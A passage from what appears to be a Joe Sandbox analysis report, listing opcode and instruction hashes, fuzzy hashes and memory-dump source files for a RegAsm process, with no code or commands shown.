                                              • Opcode ID: 9b9c7c0e1809156ef86029f4f3d150eaa7dc4d0b8c39bd286da0524f99feef04
                                              • Instruction ID: 75e17a112f02315461c5d24a71598ccc433f80a7fac83260e29c30f16fce43f1
                                              • Opcode Fuzzy Hash: 9b9c7c0e1809156ef86029f4f3d150eaa7dc4d0b8c39bd286da0524f99feef04
                                              • Instruction Fuzzy Hash: C3F05430A1AF0E8BEBBCAB6590651B672D0FF18301751097FD44BD2EA1CE76F9448741
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 770c52c1339e19b7b6dfc4dc6e975146e26a60dbaefd86775dabf135300efdfc
                                              • Instruction ID: 96750398d94316eb89c8df0f9e918198254b870b7f6cbba978981e97e3f92708
                                              • Opcode Fuzzy Hash: 770c52c1339e19b7b6dfc4dc6e975146e26a60dbaefd86775dabf135300efdfc
                                              • Instruction Fuzzy Hash: 43F0BE70A0B9AD4FEB92972C80256243BE0FF4E344B1502E7C808CB2E2CE261D428385
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5dfd0087820fb987e601b27ae6abe1bbd08bb16dc33800a357d8e83c69fc488
                                              • Instruction ID: f3dc3d92c9dc3cba588db98385a1f340bcf4c5a22d864ca5456764402fae2f0d
                                              • Opcode Fuzzy Hash: f5dfd0087820fb987e601b27ae6abe1bbd08bb16dc33800a357d8e83c69fc488
                                              • Instruction Fuzzy Hash: DAF0A86184F3CA1FD71713B14939040BFB0AD1720474E02EFC4C5CA0A3E21E498AC762
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ed0b54a452ac6e40ad507713b9a46b0b139ca00ba1dc009971f2c154d98527e
                                              • Instruction ID: 123f5518b8fce6e09dfa324c35fd43ff49ef0a5f1070bb3f72fd41b4985c6e15
                                              • Opcode Fuzzy Hash: 4ed0b54a452ac6e40ad507713b9a46b0b139ca00ba1dc009971f2c154d98527e
                                              • Instruction Fuzzy Hash: D2F08920B09D0D4FDB89FB6CC9656753AE1EF8E305B5140A9E40EC72A7DD255C94C701
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f300a7d0747753df8ef84ee327794306a254859c864b7c3caa7b3a9fb8902b08
                                              • Instruction ID: 271c55d72440a702993f49cbc854f59af752a26e4af584f7a7d3af7a5c9fba1e
                                              • Opcode Fuzzy Hash: f300a7d0747753df8ef84ee327794306a254859c864b7c3caa7b3a9fb8902b08
                                              • Instruction Fuzzy Hash: 42E0926051E6C40FC3129B38881A4647FE0EB1710534B06EEC0CACB573D60A85878301
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97bf8ef3e9f32cf279005fe51f1e1707aae7b1f1141fc1144025ba21da75bf2b
                                              • Instruction ID: 88ad83eff26a0b14976b84a27cc88344499681cb38870a4b866b8fe9dbe8de15
                                              • Opcode Fuzzy Hash: 97bf8ef3e9f32cf279005fe51f1e1707aae7b1f1141fc1144025ba21da75bf2b
                                              • Instruction Fuzzy Hash: 9AF0A92161F7C44FCB0A9A3988668603FB0EE6B21575A40EEC18ACF193D91ADC4AC702
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f76251efd52683fad7c232faaa4d837849023542df315c260afcf8eef7405274
                                              • Instruction ID: d78ca0b9865d22406f405d04837724ab94a04d00e22bee08396ecd99bf480584
                                              • Opcode Fuzzy Hash: f76251efd52683fad7c232faaa4d837849023542df315c260afcf8eef7405274
                                              • Instruction Fuzzy Hash: D0F0A010B1DA8E4BE3189F4C58221A57A92EF9D700F2505BEF40D872E7CD28BD0242C6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4d689142cfff333d1ef7ac9a93ac9f96e36aeb482f957679cdc6b731a1d15a6
                                              • Instruction ID: faa46d7f84149dc0dbb9f37fa1d56aae1aa6ed57e1793ecd180f5c3d704254ad
                                              • Opcode Fuzzy Hash: c4d689142cfff333d1ef7ac9a93ac9f96e36aeb482f957679cdc6b731a1d15a6
                                              • Instruction Fuzzy Hash: 62F0BE70E0DA8D9FEB719BA588242A93FA0FF5E300F024176D08AC71A1DA24A6008B52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e71cc0343ad9a6f30cde66dba0b6ea886722be6af0ddd58b6631342cabba3696
                                              • Instruction ID: 7ce57c6366f84f348d2a2d4ba6380a525d94b21317d0000e88191fa91199bbd2
                                              • Opcode Fuzzy Hash: e71cc0343ad9a6f30cde66dba0b6ea886722be6af0ddd58b6631342cabba3696
                                              • Instruction Fuzzy Hash: 2CF03010B0AD5D4FE38A973881216752AE2EF9F744B6540FAE00DCF2EBCD366D428355
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 680316a36efc79cb20ff882a83df8f131e1fb11804f5a9898b4bfc3fa0ca7230
                                              • Instruction ID: 945269fd621b0fb2bd2bd408b77d31976d615145795c9151ee933fee60cfdce8
                                              • Opcode Fuzzy Hash: 680316a36efc79cb20ff882a83df8f131e1fb11804f5a9898b4bfc3fa0ca7230
                                              • Instruction Fuzzy Hash: 6DF0A930B1950E8FE329AB58D4517B437A0FB0A300F4181B9E84DC72A2EA38A9958AC1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d5fa2d7f2f0dc76c4aaf500612777f08937177f24e6a56cdd3bf6c19579fb2f
                                              • Instruction ID: 3d22547e16b30345ace9164d6d898fb50789c120f26939b5fb628a6b4ebff629
                                              • Opcode Fuzzy Hash: 7d5fa2d7f2f0dc76c4aaf500612777f08937177f24e6a56cdd3bf6c19579fb2f
                                              • Instruction Fuzzy Hash: BBF01C32B0995D8FE755DB58C464BA837A2EB89310F1A417AC009CB2F2DE39AA41C740
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c93bca9f5f8c99ac9c65b37cb1e56031b13c2f23223342527cd49a4a5f1b93e
                                              • Instruction ID: d26cd5570387c8b8d1ed16be5959a6ae610730ec6faeb3f0e2f039b7430e48df
                                              • Opcode Fuzzy Hash: 5c93bca9f5f8c99ac9c65b37cb1e56031b13c2f23223342527cd49a4a5f1b93e
                                              • Instruction Fuzzy Hash: BBE01A6154F3D44FDB16ABB5886A9447FB0EE6B21078B41EFC086CF1B3E62D9889C701
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78f00a70a737496d467be6d81494be3e2628d0461cd2ee5ba10e674399543797
                                              • Instruction ID: 61b5495efee6ecfbc71b44cd2fe7d39b1b0a0c4e8d56afaea215eb5a1e0fdaef
                                              • Opcode Fuzzy Hash: 78f00a70a737496d467be6d81494be3e2628d0461cd2ee5ba10e674399543797
                                              • Instruction Fuzzy Hash: 63D05E91A0F2E50FE713067B0D240943F60AC639D038E01EBC0C5CE1A3E40D058B8356
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63654dbf13263c88cd75560d83420be53eaae40a939af277c48c68d557c12ceb
                                              • Instruction ID: 4ebd2757849cebec31329428addb2a0cf18335162f3ebe974ef9ab208d08c3e2
                                              • Opcode Fuzzy Hash: 63654dbf13263c88cd75560d83420be53eaae40a939af277c48c68d557c12ceb
                                              • Instruction Fuzzy Hash: 05D05E9195F3D54ED71316BA0C600803F606A2391079E02EBC0C5CA1B3E08E489B8352
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e73c62de047ea2327f39c17f272867b8b5b89d617a5ff48e3b357a10ca742918
                                              • Instruction ID: 71533ecb9db5aefcca043990b06cd80539b073350bf4eeeb138826ae3080b0ce
                                              • Opcode Fuzzy Hash: e73c62de047ea2327f39c17f272867b8b5b89d617a5ff48e3b357a10ca742918
                                              • Instruction Fuzzy Hash: 31E01A2194F7C04FC70B9B3688699547F70AF6761074A41EAC086CF1B3D9199949C711
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b876c64746d8f14de46aaccdbd7e8a6f7bc29dcec9c1280acaa0e039839f50d
                                              • Instruction ID: f7bad64f33daaf21b0407e22cf3a52fef974e424a9fe50aa5e6e328ec3bb4efc
                                              • Opcode Fuzzy Hash: 9b876c64746d8f14de46aaccdbd7e8a6f7bc29dcec9c1280acaa0e039839f50d
                                              • Instruction Fuzzy Hash: 7FD05E30B10D0D4B8B0CB62D885C430B3D1E7A92027D45269940AC22A5ED25ECC58780
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b7028b15b1354bdec7738c710251df17524dcd3a349d5df564f463c11c3013f
                                              • Instruction ID: 8f9882995b21a69b15933b9b4523f8086c489c7ef56d54be68d3d4e2faa891ec
                                              • Opcode Fuzzy Hash: 1b7028b15b1354bdec7738c710251df17524dcd3a349d5df564f463c11c3013f
                                              • Instruction Fuzzy Hash: 90D05E30B10D0D4B8B4CA62D885D430B3D2E7A92127D4526E940AC22A1ED25EDC58780
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b9f7f66abd651294ac4edc3db22699e3cfd41b80b786c6f000978f27e3146fc
                                              • Instruction ID: 75773d675685fcd628a49beaeaebb65aeac03d45d66bfa553079f36a5570e9c3
                                              • Opcode Fuzzy Hash: 1b9f7f66abd651294ac4edc3db22699e3cfd41b80b786c6f000978f27e3146fc
                                              • Instruction Fuzzy Hash: 31D05E30B10D0D4B8B0CA62D885C470B7D1E7A92027D45369940AC62A1ED25ECC58780
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68df6192398628efb74088681a02850bc6885ef6c2b9bb8c389dd12dc3bd51c3
                                              • Instruction ID: d4272496905bf3169518ac1522980ed7f8edc2dbd395c2b53fdca01358d9813e
                                              • Opcode Fuzzy Hash: 68df6192398628efb74088681a02850bc6885ef6c2b9bb8c389dd12dc3bd51c3
                                              • Instruction Fuzzy Hash: 47E01234664A488B8B1CEB28845543577E0FB9E205B50006DD54AC6191DA2AED86CB82
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f24604e7b2158d972f854d2b2f3c61e39c81c5f08cff34b09c40ba7110632aa
                                              • Instruction ID: b494b1e5d080cc0c5ba01d94669d20fca11a79c5f6dd64d6a9a834f50c17ec18
                                              • Opcode Fuzzy Hash: 6f24604e7b2158d972f854d2b2f3c61e39c81c5f08cff34b09c40ba7110632aa
                                              • Instruction Fuzzy Hash: 26E017E284F7C21FD70367794829464BFA0ED2722138A00EFC1C6CB0B3E45E085A8712
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 500bdd4597659cdd8035160efb8e87323e594b8f6f9d0fdc313050fa74e3eefe
                                              • Instruction ID: 3244e62f04fe14e2dc56269457eb2172f3ffa16a2a44b3745ea9b83ba006814f
                                              • Opcode Fuzzy Hash: 500bdd4597659cdd8035160efb8e87323e594b8f6f9d0fdc313050fa74e3eefe
                                              • Instruction Fuzzy Hash: 9ED0C982D9F7D65ED71352B91C79080BFA0AD675107CE01EBC8C6CB1A3E44E099A8393
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6af48aadff1baa7c068623e5f9c25ff6edf6233fb0b4acb13b612cc757c969e3
                                              • Instruction ID: c2b13d4452d194d5f975c07ba66beb10d2a0fdbd3d53c4eb35f4bae2ad2744b4
                                              • Opcode Fuzzy Hash: 6af48aadff1baa7c068623e5f9c25ff6edf6233fb0b4acb13b612cc757c969e3
                                              • Instruction Fuzzy Hash: E5D0C74176E51607F55411CD68663B47386CBCC610F51433BD109C36D5CC5D5E824292
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7cb5ce67446a03fb9763937fed3198ac5ea46a56320d56f975cf1c5b9aef3817
                                              • Instruction ID: c18faf45d3d64c849dbc451b8a2a3efa1e5d6bf6196d85c4fb4a8d06949d8004
                                              • Opcode Fuzzy Hash: 7cb5ce67446a03fb9763937fed3198ac5ea46a56320d56f975cf1c5b9aef3817
                                              • Instruction Fuzzy Hash: F6D0C71175E94D47D475625CB8511B8B3D1DBC8621F911377D40D8255ACC6969414181
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 710797ba8561a818990f4907f2d6c8d5475eb6082b013daba9dfc35c8327d1a7
                                              • Instruction ID: 3437947e3bf24049c0c7974aa1bff5e4288c7785d9c746710e771e5a33e6acd4
                                              • Opcode Fuzzy Hash: 710797ba8561a818990f4907f2d6c8d5475eb6082b013daba9dfc35c8327d1a7
                                              • Instruction Fuzzy Hash: C7D0A920B208084F8B4CA72D884883032D0EB6830278800AAE40AC72B2E829DA88C790
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd26e0025666501ab045c697355ae6e0ba4bd283da08a7d2d740a5bac081f432
                                              • Instruction ID: 898a52099a0453c97b4c903ddbfb8894690e5e86d422d688c30f499f9de30e82
                                              • Opcode Fuzzy Hash: cd26e0025666501ab045c697355ae6e0ba4bd283da08a7d2d740a5bac081f432
                                              • Instruction Fuzzy Hash: DED0C930B619088F8B5CA72C886997472D1EB6D21679540A9D00AC72B1E96AE9C9C781
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571897212c856b897f9f14d54f4192b0b9f5e22bd18b398b32332a97272894e
                                              • Instruction ID: cba2e583838584337aec74dc039c6af28181482f1952d837a8d63ff474f34148
                                              • Opcode Fuzzy Hash: 0571897212c856b897f9f14d54f4192b0b9f5e22bd18b398b32332a97272894e
                                              • Instruction Fuzzy Hash: 04D0A930B208084F8B0CA72C886886032D0EB6D20278900A8D00AC32B1EA2AD888C740
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d892ee6b600765e98afdb20cb7dfa81fe321709968f281d8936fc23fe140ee2
                                              • Instruction ID: 4f3efb311486a73f2927ef41b7355ac127b43ea8b9cd7601f374c2f745a6b2b9
                                              • Opcode Fuzzy Hash: 6d892ee6b600765e98afdb20cb7dfa81fe321709968f281d8936fc23fe140ee2
                                              • Instruction Fuzzy Hash: 5BD0A774454A4C4FDB50FF94D4004A9B360FB48304F400656EC1CC3251D735A6A6C741
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5ae55e384be72461f006b0b7786e47f3c41798fbc26f5703421d11482e1e9b76
                                              • Instruction ID: cee970318b2b9d8a24854fd6dc8bee312fa0d8ad43b6bf4c66d1022f3ceab4da
                                              • Opcode Fuzzy Hash: 5ae55e384be72461f006b0b7786e47f3c41798fbc26f5703421d11482e1e9b76
                                              • Instruction Fuzzy Hash: 8DD02230B508044FC70CA7388C9C83033D0EB6E20678200A8D00BC72B1D92ADC89CB80
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5da90822c93a11194fea6e04dfd5cff8de07d035d55d7c42e9e2cb314115bc7
                                              • Instruction ID: 500b743c9408617dbd7a4b03a12869abf5b5764b01b653240447fad3a5bf72c8
                                              • Opcode Fuzzy Hash: d5da90822c93a11194fea6e04dfd5cff8de07d035d55d7c42e9e2cb314115bc7
                                              • Instruction Fuzzy Hash: 40D0673071CB498BE658EA9DD86157EB7D2EB98B00F100539A08AD33A6DD24FD418B42
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79e27945db6538d9c8cd776b352795047267ea90bf4e567d18f352d01f2ff1a8
                                              • Instruction ID: 42421dc21c3ea6824baea39b1456cc48793c2cedf480607ea1d480d4d59997d5
                                              • Opcode Fuzzy Hash: 79e27945db6538d9c8cd776b352795047267ea90bf4e567d18f352d01f2ff1a8
                                              • Instruction Fuzzy Hash: C3E05B34B0930EDFEB10EB94C4946EC7B71EF55725F108275C005976A8DE78A784CB40
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 385aa17c72819e725a5e8a596cdc85928b42fd5367ab9150a7437aa87c388793
                                              • Instruction ID: 61d913926c0234e2395dca79df5562037569a59a85e768a99c6d958f4d3826c2
                                              • Opcode Fuzzy Hash: 385aa17c72819e725a5e8a596cdc85928b42fd5367ab9150a7437aa87c388793
                                              • Instruction Fuzzy Hash: D5C0123065580C4F874CE725C458D7036D0EB182057910095940AC61B1D9199998C791
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95e11c21bce0dbf7c9a38fbd01bf1597f49ad81c68fd1684253c2c767e8a5898
                                              • Instruction ID: 5a73b94799b71dfa695a29548f3f37f0c89489417d273fcb58d4855d31233686
                                              • Opcode Fuzzy Hash: 95e11c21bce0dbf7c9a38fbd01bf1597f49ad81c68fd1684253c2c767e8a5898
                                              • Instruction Fuzzy Hash: E0C04C345518084F8B4CEB29C899D5077E0EB692157850199940AC7571EA569D98CB81
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95e11c21bce0dbf7c9a38fbd01bf1597f49ad81c68fd1684253c2c767e8a5898
                                              • Instruction ID: 5a73b94799b71dfa695a29548f3f37f0c89489417d273fcb58d4855d31233686
                                              • Opcode Fuzzy Hash: 95e11c21bce0dbf7c9a38fbd01bf1597f49ad81c68fd1684253c2c767e8a5898
                                              • Instruction Fuzzy Hash: E0C04C345518084F8B4CEB29C899D5077E0EB692157850199940AC7571EA569D98CB81
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dcebd30775dcbfa7951e8e3a4dbc7f3484003b52e3ecdec908b69488f2058f21
                                              • Instruction ID: 2e238397a91bdac5e469b4c68b78a2ad9be5eac650c5020fdd3992ee920e3032
                                              • Opcode Fuzzy Hash: dcebd30775dcbfa7951e8e3a4dbc7f3484003b52e3ecdec908b69488f2058f21
                                              • Instruction Fuzzy Hash: D9B01211D5740903C61833B51D89054B820FA4D191FD10050DC0AC0080E64E09E40782
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1be54059da3941b8afe21f755b162cb9ae7012894f36bf963990f90998b76ce
                                              • Instruction ID: ab1c527b11992b90dda79bd82431183c5f58c44f3f6cae9f6f4c4c6070bf9019
